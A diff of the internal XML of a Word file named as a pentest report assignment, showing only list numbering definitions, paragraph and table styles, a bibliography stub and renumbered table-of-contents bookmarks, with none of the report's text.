+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="419E1B94"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6F323C44"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4294697F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6A3032BE"/>
+    <w:lvl w:ilvl="0" w:tplc="2280E944">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="42DE0A1C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="DAC2CA82"/>
+    <w:lvl w:ilvl="0" w:tplc="CC84724A">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1560" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1980" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2400" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2820" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3660" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4080" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4500" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="64212354"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="321EF54A"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="6523477E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="FA1E1858"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="668D7AC4"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="0CC4FA40"/>
+    <w:lvl w:ilvl="0" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7D3F1F08"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="880E24E4"/>
+    <w:lvl w:ilvl="0" w:tplc="6636965A">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="9">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="10">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -5582,6 +12648,35 @@
       <w:ind w:left="440"/>
     </w:pPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="001C3373"/>
+    <w:pPr>
+      <w:ind w:firstLineChars="200" w:firstLine="420"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="TableGrid">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="39"/>
+    <w:rsid w:val="00737772"/>
+    <w:pPr>
+      <w:spacing w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+    </w:tblPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -5903,4 +12998,16 @@
   </a:objectDefaults>
   <a:extraClrSchemeLst/>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8059C1B6-7991-4EA6-9B7A-4E66A56E7B1A}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -271,7 +271,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc71299205"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc71325098"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Executive Summary</w:t>
@@ -922,7 +922,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc71299205" w:history="1">
+          <w:hyperlink w:anchor="_Toc71325098" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -949,7 +949,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71299205 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325098 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -994,7 +994,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71299206" w:history="1">
+          <w:hyperlink w:anchor="_Toc71325099" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1021,7 +1021,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71299206 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71325099 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
